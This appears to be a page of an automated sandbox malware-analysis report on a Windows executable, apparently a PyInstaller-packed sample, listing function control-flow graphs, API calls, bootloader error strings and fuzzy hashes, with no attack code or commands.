                                                                                                                                                                                                      control_flow_graph 465 7ff7ff5a69d4-7ff7ff5a6a47 call 7ff7ff5a6708 468 7ff7ff5a6a61-7ff7ff5a6a6b call 7ff7ff598590 465->468 469 7ff7ff5a6a49-7ff7ff5a6a52 call 7ff7ff594f58 465->469 475 7ff7ff5a6a86-7ff7ff5a6aef CreateFileW 468->475 476 7ff7ff5a6a6d-7ff7ff5a6a84 call 7ff7ff594f58 call 7ff7ff594f78 468->476 474 7ff7ff5a6a55-7ff7ff5a6a5c call 7ff7ff594f78 469->474 489 7ff7ff5a6da2-7ff7ff5a6dc2 474->489 479 7ff7ff5a6af1-7ff7ff5a6af7 475->479 480 7ff7ff5a6b6c-7ff7ff5a6b77 GetFileType 475->480 476->474 485 7ff7ff5a6b39-7ff7ff5a6b67 GetLastError call 7ff7ff594eec 479->485 486 7ff7ff5a6af9-7ff7ff5a6afd 479->486 482 7ff7ff5a6bca-7ff7ff5a6bd1 480->482 483 7ff7ff5a6b79-7ff7ff5a6bb4 GetLastError call 7ff7ff594eec CloseHandle 480->483 492 7ff7ff5a6bd3-7ff7ff5a6bd7 482->492 493 7ff7ff5a6bd9-7ff7ff5a6bdc 482->493 483->474 500 7ff7ff5a6bba-7ff7ff5a6bc5 call 7ff7ff594f78 483->500 485->474 486->485 487 7ff7ff5a6aff-7ff7ff5a6b37 CreateFileW 486->487 487->480 487->485 497 7ff7ff5a6be2-7ff7ff5a6c37 call 7ff7ff5984a8 492->497 493->497 498 7ff7ff5a6bde 493->498 503 7ff7ff5a6c56-7ff7ff5a6c87 call 7ff7ff5a6488 497->503 504 7ff7ff5a6c39-7ff7ff5a6c45 call 7ff7ff5a6910 497->504 498->497 500->474 511 7ff7ff5a6c89-7ff7ff5a6c8b 503->511 512 7ff7ff5a6c8d-7ff7ff5a6ccf 503->512 504->503 510 7ff7ff5a6c47 504->510 513 7ff7ff5a6c49-7ff7ff5a6c51 call 7ff7ff59ab30 510->513 511->513 514 7ff7ff5a6cf1-7ff7ff5a6cfc 512->514 515 7ff7ff5a6cd1-7ff7ff5a6cd5 512->515 513->489 516 7ff7ff5a6da0 514->516 517 7ff7ff5a6d02-7ff7ff5a6d06 514->517 515->514 519 7ff7ff5a6cd7-7ff7ff5a6cec 515->519 516->489 517->516 520 7ff7ff5a6d0c-7ff7ff5a6d51 CloseHandle CreateFileW 517->520 519->514 522 7ff7ff5a6d53-7ff7ff5a6d81 GetLastError call 7ff7ff594eec call 7ff7ff5986d0 520->522 523 7ff7ff5a6d86-7ff7ff5a6d9b 520->523 522->523 523->516
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                      • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                      • Instruction ID: c94df809199b81bb341f8ac31c980e2f54dd82e759c8744b17fa9702197ee3d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBC1DE36B29A8285EB10EF65C4902AC7761FB48B98F814335DA3E5B7D4DF38D421C3A0
                                                                                                                                                                                                      Function 00007FF7FF5892F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                      • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                      • Instruction ID: 80f56aa61dc15b83b9b1069b43413b770e257c14297a8feb480ef5b14cc13ec1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF06822A197C186FB609F64B4497A6B750FB84769F840335DA7D036D4DF3CD059CA50
                                                                                                                                                                                                      Function 00007FF7FF581950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 267 7ff7ff581950-7ff7ff58198b call 7ff7ff5845b0 270 7ff7ff581c4e-7ff7ff581c72 call 7ff7ff58c5c0 267->270 271 7ff7ff581991-7ff7ff5819d1 call 7ff7ff587f80 267->271 276 7ff7ff581c3b-7ff7ff581c3e call 7ff7ff5900bc 271->276 277 7ff7ff5819d7-7ff7ff5819e7 call 7ff7ff590744 271->277 281 7ff7ff581c43-7ff7ff581c4b 276->281 282 7ff7ff5819e9-7ff7ff581a03 call 7ff7ff594f78 call 7ff7ff582910 277->282 283 7ff7ff581a08-7ff7ff581a24 call 7ff7ff59040c 277->283 281->270 282->276 289 7ff7ff581a26-7ff7ff581a40 call 7ff7ff594f78 call 7ff7ff582910 283->289 290 7ff7ff581a45-7ff7ff581a5a call 7ff7ff594f98 283->290 289->276 296 7ff7ff581a5c-7ff7ff581a76 call 7ff7ff594f78 call 7ff7ff582910 290->296 297 7ff7ff581a7b-7ff7ff581afc call 7ff7ff581c80 * 2 call 7ff7ff590744 290->297 296->276 309 7ff7ff581b01-7ff7ff581b14 call 7ff7ff594fb4 297->309 312 7ff7ff581b16-7ff7ff581b30 call 7ff7ff594f78 call 7ff7ff582910 309->312 313 7ff7ff581b35-7ff7ff581b4e call 7ff7ff59040c 309->313 312->276 319 7ff7ff581b50-7ff7ff581b6a call 7ff7ff594f78 call 7ff7ff582910 313->319 320 7ff7ff581b6f-7ff7ff581b8b call 7ff7ff590180 313->320 319->276 326 7ff7ff581b9e-7ff7ff581bac 320->326 327 7ff7ff581b8d-7ff7ff581b99 call 7ff7ff582710 320->327 326->276 330 7ff7ff581bb2-7ff7ff581bb9 326->330 327->276 333 7ff7ff581bc1-7ff7ff581bc7 330->333 334 7ff7ff581bc9-7ff7ff581bd6 333->334 335 7ff7ff581be0-7ff7ff581bef 333->335 336 7ff7ff581bf1-7ff7ff581bfa 334->336 335->335 335->336 337 7ff7ff581bfc-7ff7ff581bff 336->337 338 7ff7ff581c0f 336->338 337->338 339 7ff7ff581c01-7ff7ff581c04 337->339 340 7ff7ff581c11-7ff7ff581c24 338->340 339->338 343 7ff7ff581c06-7ff7ff581c09 339->343 341 7ff7ff581c2d-7ff7ff581c39 340->341 342 7ff7ff581c26 340->342 341->276 341->333 342->341 343->338 344 7ff7ff581c0b-7ff7ff581c0d 343->344 344->340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF587F80: _fread_nolock.LIBCMT ref: 00007FF7FF58802A
                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7FF581A1B
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                      • Opcode ID: f5f5a2109c8ebe96ba65e6405a0f666f499af530aab8d8df8c5f1ddcbd1361c0
                                                                                                                                                                                                      • Instruction ID: e8ff027ac9776c38a0ce57b0106014e78f9e1177fbabef214dfc03ec36f5e0e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5f5a2109c8ebe96ba65e6405a0f666f499af530aab8d8df8c5f1ddcbd1361c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39818D71A096C696EB20AB24D0402F9A3A1FF48784F944631E9BD477D6EE3CE585C7E0
                                                                                                                                                                                                      Function 00007FF7FF581470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                      • Opcode ID: 71bfcb70b10ac35bf551f09be6461cd7222aab54515371a44450b6461487e842
                                                                                                                                                                                                      • Instruction ID: 5b6b33ed697c359332aefdb7fbe7964c5e1acf495db062e22284dca0a21d8ac2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bfcb70b10ac35bf551f09be6461cd7222aab54515371a44450b6461487e842
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC413922A086C295EB10BB22A4405F9A390BF45794FC44A32ED7D07BE5DE3CE555CBE0
                                                                                                                                                                                                      Function 00007FF7FF581210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 528 7ff7ff581210-7ff7ff58126d call 7ff7ff58bdf0 531 7ff7ff581297-7ff7ff5812af call 7ff7ff594fb4 528->531 532 7ff7ff58126f-7ff7ff581296 call 7ff7ff582710 528->532 537 7ff7ff5812d4-7ff7ff5812e4 call 7ff7ff594fb4 531->537 538 7ff7ff5812b1-7ff7ff5812cf call 7ff7ff594f78 call 7ff7ff582910 531->538 544 7ff7ff581309-7ff7ff58131b 537->544 545 7ff7ff5812e6-7ff7ff581304 call 7ff7ff594f78 call 7ff7ff582910 537->545 549 7ff7ff581439-7ff7ff58146d call 7ff7ff58bad0 call 7ff7ff594fa0 * 2 538->549 548 7ff7ff581320-7ff7ff581345 call 7ff7ff59040c 544->548 545->549 555 7ff7ff58134b-7ff7ff581355 call 7ff7ff590180 548->555 556 7ff7ff581431 548->556 555->556 564 7ff7ff58135b-7ff7ff581367 555->564 556->549 566 7ff7ff581370-7ff7ff581398 call 7ff7ff58a230 564->566 569 7ff7ff58139a-7ff7ff58139d 566->569 570 7ff7ff581416-7ff7ff58142c call 7ff7ff582710 566->570 571 7ff7ff581411 569->571 572 7ff7ff58139f-7ff7ff5813a9 569->572 570->556 571->570 574 7ff7ff5813ab-7ff7ff5813b9 call 7ff7ff590b4c 572->574 575 7ff7ff5813d4-7ff7ff5813d7 572->575 581 7ff7ff5813be-7ff7ff5813c1 574->581 576 7ff7ff5813ea-7ff7ff5813ef 575->576 577 7ff7ff5813d9-7ff7ff5813e7 call 7ff7ff5a9ea0 575->577 576->566 580 7ff7ff5813f5-7ff7ff5813f8 576->580 577->576 583 7ff7ff58140c-7ff7ff58140f 580->583 584 7ff7ff5813fa-7ff7ff5813fd 580->584 585 7ff7ff5813c3-7ff7ff5813cd call 7ff7ff590180 581->585 586 7ff7ff5813cf-7ff7ff5813d2 581->586 583->556 584->570 587 7ff7ff5813ff-7ff7ff581407 584->587 585->576 585->586 586->570 587->548
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                      • Opcode ID: 7c622f44ab0603646b96b7551e00a0cf11f080941f502b7234a6157c9231b4b4
                                                                                                                                                                                                      • Instruction ID: fc1cdf96532a676fd4d30c97842cd2cce772d914208fd1d27e531a96dd1b30c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c622f44ab0603646b96b7551e00a0cf11f080941f502b7234a6157c9231b4b4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB51C422A09AC241EB60BB11A4403FAE291BF85794FC44331ED7E47BE5EE3CE545C7A0
                                                                                                                                                                                                      Function 00007FF7FF59ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EEFC
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EF08
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                      • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                      • Instruction ID: 94eb0019f1b89339c6a4af6289785c40a53f72699f06dfac20263d869b6f258d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E641D221B196A282EB2AEB1698445F5A791BF48B90FC84739DD3D573D4EE3CE40582B0
                                                                                                                                                                                                      Function 00007FF7FF5836B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836E1
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836EB
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582C50: MessageBoxW.USER32 ref: 00007FF7FF582D99
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                      • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                      • Instruction ID: f5f5644522468bfb6c97155f5e32020bca623684ed21aa1b6ac219ac407b73c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4218391B19AC251FB20BB24E8043F6A290BF48755FC40332D57EC35E5EE2CE604C7A0
                                                                                                                                                                                                      Function 00007FF7FF59BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 715 7ff7ff59bacc-7ff7ff59baf2 716 7ff7ff59baf4-7ff7ff59bb08 call 7ff7ff594f58 call 7ff7ff594f78 715->716 717 7ff7ff59bb0d-7ff7ff59bb11 715->717 731 7ff7ff59befe 716->731 718 7ff7ff59bee7-7ff7ff59bef3 call 7ff7ff594f58 call 7ff7ff594f78 717->718 719 7ff7ff59bb17-7ff7ff59bb1e 717->719 738 7ff7ff59bef9 call 7ff7ff59a950 718->738 719->718 721 7ff7ff59bb24-7ff7ff59bb52 719->721 721->718 724 7ff7ff59bb58-7ff7ff59bb5f 721->724 728 7ff7ff59bb61-7ff7ff59bb73 call 7ff7ff594f58 call 7ff7ff594f78 724->728 729 7ff7ff59bb78-7ff7ff59bb7b 724->729 728->738 734 7ff7ff59bb81-7ff7ff59bb87 729->734 735 7ff7ff59bee3-7ff7ff59bee5 729->735 736 7ff7ff59bf01-7ff7ff59bf18 731->736 734->735 739 7ff7ff59bb8d-7ff7ff59bb90 734->739 735->736 738->731 739->728 742 7ff7ff59bb92-7ff7ff59bbb7 739->742 744 7ff7ff59bbea-7ff7ff59bbf1 742->744 745 7ff7ff59bbb9-7ff7ff59bbbb 742->745 746 7ff7ff59bbf3-7ff7ff59bbff call 7ff7ff59d66c 744->746 747 7ff7ff59bbc6-7ff7ff59bbdd call 7ff7ff594f58 call 7ff7ff594f78 call 7ff7ff59a950 744->747 748 7ff7ff59bbe2-7ff7ff59bbe8 745->748 749 7ff7ff59bbbd-7ff7ff59bbc4 745->749 756 7ff7ff59bc04-7ff7ff59bc1b call 7ff7ff59a9b8 * 2 746->756 779 7ff7ff59bd70 747->779 751 7ff7ff59bc68-7ff7ff59bc7f 748->751 749->747 749->748 754 7ff7ff59bc81-7ff7ff59bc89 751->754 755 7ff7ff59bcfa-7ff7ff59bd04 call 7ff7ff5a398c 751->755 754->755 759 7ff7ff59bc8b-7ff7ff59bc8d 754->759 766 7ff7ff59bd0a-7ff7ff59bd1f 755->766 767 7ff7ff59bd8e 755->767 775 7ff7ff59bc38-7ff7ff59bc63 call 7ff7ff59c2f4 756->775 776 7ff7ff59bc1d-7ff7ff59bc33 call 7ff7ff594f78 call 7ff7ff594f58 756->776 759->755 763 7ff7ff59bc8f-7ff7ff59bca5 759->763 763->755 768 7ff7ff59bca7-7ff7ff59bcb3 763->768 766->767 772 7ff7ff59bd21-7ff7ff59bd33 GetConsoleMode 766->772 770 7ff7ff59bd93-7ff7ff59bdb3 ReadFile 767->770 768->755 773 7ff7ff59bcb5-7ff7ff59bcb7 768->773 777 7ff7ff59bdb9-7ff7ff59bdc1 770->777 778 7ff7ff59bead-7ff7ff59beb6 GetLastError 770->778 772->767 780 7ff7ff59bd35-7ff7ff59bd3d 772->780 773->755 781 7ff7ff59bcb9-7ff7ff59bcd1 773->781 775->751 776->779 777->778 783 7ff7ff59bdc7 777->783 786 7ff7ff59bed3-7ff7ff59bed6 778->786 787 7ff7ff59beb8-7ff7ff59bece call 7ff7ff594f78 call 7ff7ff594f58 778->787 788 7ff7ff59bd73-7ff7ff59bd7d call 7ff7ff59a9b8 779->788 780->770 785 7ff7ff59bd3f-7ff7ff59bd61 ReadConsoleW 780->785 781->755 789 7ff7ff59bcd3-7ff7ff59bcdf 781->789 794 7ff7ff59bdce-7ff7ff59bde3 783->794 796 7ff7ff59bd82-7ff7ff59bd8c 785->796 797 7ff7ff59bd63 GetLastError 785->797 791 7ff7ff59bd69-7ff7ff59bd6b call 7ff7ff594eec 786->791 792 7ff7ff59bedc-7ff7ff59bede 786->792 787->779 788->736 789->755 790 7ff7ff59bce1-7ff7ff59bce3 789->790 790->755 800 7ff7ff59bce5-7ff7ff59bcf5 790->800 791->779 792->788 794->788 802 7ff7ff59bde5-7ff7ff59bdf0 794->802 796->794 797->791 800->755 807 7ff7ff59bdf2-7ff7ff59be0b call 7ff7ff59b6e4 802->807 808 7ff7ff59be17-7ff7ff59be1f 802->808 815 7ff7ff59be10-7ff7ff59be12 807->815 811 7ff7ff59be21-7ff7ff59be33 808->811 812 7ff7ff59be9b-7ff7ff59bea8 call 7ff7ff59b524 808->812 816 7ff7ff59be35 811->816 817 7ff7ff59be8e-7ff7ff59be96 811->817 812->815 815->788 819 7ff7ff59be3a-7ff7ff59be41 816->819 817->788 820 7ff7ff59be43-7ff7ff59be47 819->820 821 7ff7ff59be7d-7ff7ff59be88 819->821 822 7ff7ff59be63 820->822 823 7ff7ff59be49-7ff7ff59be50 820->823 821->817 825 7ff7ff59be69-7ff7ff59be79 822->825 823->822 824 7ff7ff59be52-7ff7ff59be56 823->824 824->822 826 7ff7ff59be58-7ff7ff59be61 824->826 825->819 827 7ff7ff59be7b 825->827 826->825 827->817
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
